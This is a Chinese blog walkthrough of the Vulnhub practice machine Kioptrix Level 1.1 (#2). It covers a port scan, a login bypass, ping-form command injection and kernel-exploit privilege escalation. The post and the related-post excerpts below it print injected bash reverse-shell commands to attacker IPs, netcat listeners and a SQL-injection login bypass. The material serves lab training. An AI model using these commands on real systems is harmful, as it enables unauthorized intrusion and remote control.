Vulnhub-靶机-Kioptrix: Level 1.1 (#2)

最新推荐文章于 2023-11-19 19:33:09 发布
最新推荐文章于 2023-11-19 19:33:09 发布
阅读量440 收藏
点赞数
分类专栏: Vulnhub-靶机 文章标签: shell 靶机 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/113333986
版权

Vulnhub—靶机—Kioptrix: Level 1.1 (#2)

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

文章目录

一、信息收集

【步骤一】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.76.33
在这里插入图片描述

【步骤二】目标靶机开放了80端口http服务,浏览器访问查看
在这里插入图片描述

【步骤三】Web页面是个登录窗口,尝试使用万能密码绕过
在这里插入图片描述在这里插入图片描述

【步骤四】登入后发现目标是一个ping命令窗口,尝试命令执行
【命令】127.0.0.1 && whoami
在这里插入图片描述

二、漏洞利用

【步骤五】发现目标存在命令执行漏洞,反弹shell,kali本地监听8080端口
【命令】127.0.0.1 && bash -i >& /dev/tcp/192.168.76.95/8080 0>&1
在这里插入图片描述

在这里插入图片描述

【步骤六】查看当前版本号,根据版本号寻找合适的exp提权
在这里插入图片描述在这里插入图片描述

【步骤七】将9542上传到靶机
在这里插入图片描述

在这里插入图片描述

【步骤八】查看上传的exp权限,并赋予可执行权限
在这里插入图片描述

【步骤九】使用gcc编译执行,查看当前用户
在这里插入图片描述

三、Flag

【flag】

夜白君
关注
专栏目录
Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录
weixin_45509443的博客
06-19 473
环境:靶机:192.168.1.107 kali:192.168.106 主机发现 端口扫描 浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录 成功进入,经典ping命令,存在命令执行 kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到kali攻击机 成功反弹但不是root权限,开始...
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 872
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
oscp——Kioptrix: Level 1.1 (#2)
王嘟嘟的博客
02-20 1278
0x00 前言 第三十二台机子 0x01 信息收集 0x02 Web80-webshell 访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码 成功进入后台,可以看到是一个执行ping命令的执行窗口 这里反弹一下shell,这里使用 bash -i >& /dev/tcp/192.168.0.111/1234 >&1 然后在/...
vulnhub Kioptrix: Level 1.1 (#2)
箭雨镜屋
11-19 2666
本文的攻击路径是:端口扫描-->万能密码web登录-->RCE获得反弹shell-->系统版本漏洞提权
Vulhub靶场 --- Kioptrix: Level 1.1 (#2)
m0_52072483的博客
01-26 219
Vulhub靶场 — KIOPTRIX: LEVEL 1.1 nmap扫描端口信息 dirb 扫描目录信息 在登录页面使用PHP的万能密码尝试登录,且登录成功 登录成功的页面是一个可以ping的远程命令执行 获得shell 查看系统信息 查找是否存在可利用的漏洞 提权成功 ...
Kioptrix: Level 1.1 (#2)
战神/calmness的博客
06-04 1080
下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ 目标机器:192.168.243.147 攻击机器:192.168.210.134 目录 信息收集 万能和密码破解 命令执行 反弹shell 监听 提权 版本内核 linux 2.6.9 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (proto...
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 532
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
Vulnhub靶机系列:Kioptrix: 2014 (#5)
汗的博客
04-06 1237
这次的靶机Vulnhub靶机: 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-2014-5,62/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇
qq_27466929的博客
09-11 1253
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.3
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulhub靶场-KIOPTRIX: LEVEL 1.1
最新发布
B_l_a_nk的博客
11-19 360
万能秘密,命令执行,内核漏洞提权
Vulnhub-靶机-Kioptrix: Level 1 (#1)
qq_43264813的博客
01-28 666
Vulnhub靶机Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub靶机Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.4
vulhub - Kioptrix: Level 1.1 (#2) writeup
Jiajiajiang_的博客
12-12 759
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover netdiscover -i eth0 -r 172.21.137.0/24 找到IP为:172.21.137.47 端口...
Kioptrix Level 1 渗透方案
SecUpdate的专栏
06-22 3161
目标:Kioptrix Level 1[VMWare] 本机环境:BackTrack5 RC3[VMware](192.168.74.145) 网关:192.168.74.254 使用工具:nmap #1:查看 Kioptrix 在内网的IP地址。 工具:nmap 命令:nmap 192.168.74.0/24 –n –sP -sn 得到IP:192.168.74.1
KIOPTRIX: LEVEL 1.1 (#2)
logan_logan的博客
12-19 215
KIOPTRIX: LEVEL 1.1 (#2) 1.在浏览器输入地址,打开网页发现是一个登录框;接下来进行信息收集; 2.信息收集 2.1端口扫描 使用nmap工具发现可以枚举很多的端口,后面因为找到了其它漏洞就没有进行尝试; 2.2目录枚举 使用gobuster工具进行枚举,但是没有什么帮助; 3.漏洞探测 3.1 登录框存在sql注入漏洞,使用万能密码 admin’ or’1’=’1可以登录; 3.2 对登录之后的界面进行探测的时候发现存在命令注入漏洞; 4.漏洞利用 4.1 反弹she
Kioptrix Level2
底层社会中的弱智
04-16 899
目标IP:192.168.11.176 端口开放情况: 先从80端口入手 使用抓包--爆破 暂不使用 测试注入 目录扫描 使用post传值,我们抓包后放到sqlmap中测试 添加*号优先测试 sqlmap -r q.txt --level 5 --risk 3 逐步跑出用户名和密码 sqlmap -r q.txt --level 5 --risk 3 -...
vulnhub- Kioptrix: Level 1.1 (#2) (考点:sql注入/命令执行/linux版本提权)
冬萍子癸水
04-19 433
arp-scan -l 扫出来多的那个就是 nmap map scan report for 192.168.189.164 Host is up (0.00054s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (pro...
Vulnhub-靶机-Kioptrix: Level 1.2 (#3)
qq_43264813的博客
01-28 817
Vulnhub靶机Kioptrix: Level 1.2 (#3) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub靶机Kioptrix: Level 1.2 (#3)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -n -sC -s
Kioptrix Level 1.2 (#3)靶机攻破:信息收集与权限提升
"Kioptrix: Level 1.2 (#3) 是一款Vulnhub靶机,用于网络安全渗透测试练习。靶机IP为192.168.190.189,需配置host指向kioptrix3.com。攻破靶机涉及信息收集、漏洞利用、GETShell以及提权等技能,主要工具包括dirb...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值